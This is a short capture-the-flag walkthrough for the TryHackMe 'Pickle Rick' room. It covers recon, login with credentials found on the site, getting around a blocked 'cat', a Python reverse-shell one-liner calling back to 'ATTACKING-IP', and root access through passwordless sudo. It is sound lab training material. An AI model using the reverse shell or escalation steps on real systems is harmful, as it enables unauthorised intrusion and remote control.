Pickle Rick -THM

Recon:

Let’s start by doing a nmap scan on the given machine to see open ports.

navigating to port 80, and looking at the source code, we get the username as : R1ckRul3s .

On running gobuster, we can see that we have a directory named assets. Let’s go there.

Let’s also go to /robots.txt and see what we can find

Wubbalubbadubdub. xD

Gobuster results :

Let’s try to login with the username and with the string we got as password.

we are met with a panel where we can execute commands, and ‘cat’ doesn’t work!

So let’s just trick this and use tac instead

using tac on clue.txt gives output as:

Look around the file system for the other ingredient.

tac Sup3rS3cretPickl3Ingred.txt

Running this will give you the first ingredient as output.

Now, let’s get a reverse shell to the system using python3 script

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

There we go we have the reverse shell.

make the shell interactive using

/bin/bash -ki

get linpeas.sh file here in this shell and run it, you’ll see sudo can run any commands/tool without a password. or run sudo -l to see permissions

Run :

sudo bash

to get root access and voila, search for the second and third ingredients by navigating to user home directories.

John hammond has a really cool project which makes is easier to transfer files from your system to the machine. check this out without you having to setup netcat and stuff : https://github.com/JohnHammond/poor-mans-pentest/blob/master/upload_file_nc.sh .

Keep hackin!

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!